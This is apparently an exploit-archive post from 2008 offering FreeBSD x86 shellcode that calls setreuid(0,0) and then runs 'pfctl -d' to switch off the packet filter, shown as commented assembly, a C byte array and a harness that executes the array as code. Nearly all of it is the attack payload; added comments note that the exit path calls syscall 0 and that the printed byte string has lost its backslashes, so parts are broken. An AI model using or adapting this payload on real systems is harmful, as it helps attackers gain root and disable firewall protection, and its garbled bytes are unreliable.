
# Title : freebsd/x86 setreuid, execve(pfctl -d) 56 bytes
# Published : 2008-09-12
# Author : suN8Hclf
# Previous Title : linux/x86 setresuid(0,0,0) /bin/sh shellcode 35 bytes
# Next Title : linux/x86 iopl(3); asm(cli); while(1){} 12 bytes


***(C)oDed bY suN8Hclf***
               DaRk-CodeRs Group production, kid
     [FreeBSD x86 setreuid(0, 0) + execve(pfctl -d) 56 bytes]

The simplest way to disable FreeBSD's packet filter. We do not
flush all rules (pfctl -F all) but only turn the firewall off.

Assembly code:
-------------------------code.asm--------------------------
; FreeBSD/i386 shellcode: setreuid(0, 0), then
; execve("//sbin/pfctl", {"//sbin/pfctl", "-d", NULL}, NULL).
; Syntax/target: NASM, 32-bit, FreeBSD i386 syscall ABI via int 0x80.
; FreeBSD convention (unlike Linux): the syscall number goes in eax and the
; arguments live on the stack, with one 4-byte slot at [esp] that the kernel
; skips (the return-address slot a libc `call` wrapper would leave behind);
; arg1 is at [esp+4], arg2 at [esp+8], ...  That is why every syscall below
; ends with an extra `push eax` right before `int 0x80`.
; The code is NUL-free: the path is padded to "//sbin/pfctl" (12 bytes = 3 dwords)
; and every string/pointer terminator comes from the zeroed eax.
; Defender's view: the observable behaviour is a setreuid(0,0) followed by an
; execve of /sbin/pfctl with "-d" (pf disabled) from whatever process was
; hijacked; pf state and rules are not flushed, only the filter is turned off.
section .text
global _start

_start:

	xor eax, eax       ; eax = 0 (source of every NUL/NULL below)
	push eax           ; euid = 0
	push eax           ; ruid = 0
	mov al, 126        ; SYS_setreuid (126 on FreeBSD)
	push eax           ; dummy return-address slot; the kernel ignores its value
	int 0x80           ; setreuid()

	xor eax, eax       ; eax = 0 again (eax held setreuid's return value)
	push eax           ; NUL terminator for the argument string
	push word 0x642d   ; "-d" (little-endian: 0x2d '-', 0x64 'd')
	mov ecx, esp       ; ecx contains a pointer to "-d" string

	push eax           ; NUL terminator for the path
	push 0x6c746366    ; "fctl"
	push 0x702f6e69    ; "in/p"
	push 0x62732f2f    ; "//sb" -- the doubled slash pads the path to 12 bytes so no NUL is needed
	mov ebx, esp       ; ebx contains a pointer to "//sbin/pfctl" string

	push eax           ; argv[2] = NULL
	push ecx           ; argv[1] = "-d"
	push ebx           ; argv[0] = "//sbin/pfctl"
	mov ecx, esp       ; ecx = argv

	push eax           ; envp = NULL
	push ecx           ; argv
	push ebx           ; path
	mov al, 0x3b       ; SYS_execve (59 on FreeBSD)
	push eax           ; dummy return-address slot
	int 0x80          ; execve()

	; Only reached if execve() failed.
	xor eax, eax       ; NOTE(review): eax = 0 here, i.e. syscall 0 -- not exit(2), whose
	push eax           ; number on FreeBSD is 1. The "exit()" label below looks wrong, so
	push eax           ; the failure path does not terminate cleanly as apparently intended.
	int 0x80          ; exit()
-------------------------code.asm--------------------------
And C code:
-------------------------code.c----------------------------
#include <stdio.h>

/*
 * Raw bytes of code.asm above (55 instruction bytes; the "56 bytes" in the
 * title presumably counts this string's terminating NUL).
 * As printed here the escape backslashes appear to have been lost in
 * extraction, so what is shown is literal ASCII text, not the byte sequence.
 */
char shellcode[]=
"x31xc0x50x50xb0x7ex50xcdx80x31xc0x50x66x68x2dx64" 
"x89xe1x50x68x66x63x74x6cx68x69x6ex2fx70x68x2fx2f"
"x73x62x89xe3x50x51x53x89xe1x50x51x53xb0x3bx50xcd"
"x80x31xc0x50x50xcdx80";

/*
 * Test harness: jump into the byte array as if it were a function.
 * The array lives in the writable data segment, so this only works where
 * data pages are executable; on systems enforcing W^X / NX the call faults,
 * which is exactly the mitigation this style of loader depends on being
 * absent.  argc/argv are unused, the (int) cast discards a value that is
 * never used, and main falls off the end without an explicit return
 * (implicitly 0 in C99, undefined in C89).
 */
int main(int argc, char *argv[]){
	int (*func)();                    /* pointer to a function with unspecified parameters */
	func=(int (*)())shellcode;        /* reinterpret the data array as code */
	(int)(*func)();                   /* does not return if execve() succeeds */
}
-------------------------code.c----------------------------

Greetz to: 0in, cOndemned (and to other DaRk-CodeRs members), str0ke, e.wiZz!, 
           Katharsis, doctor and many others...
Visit us : www.dark-coders.pl
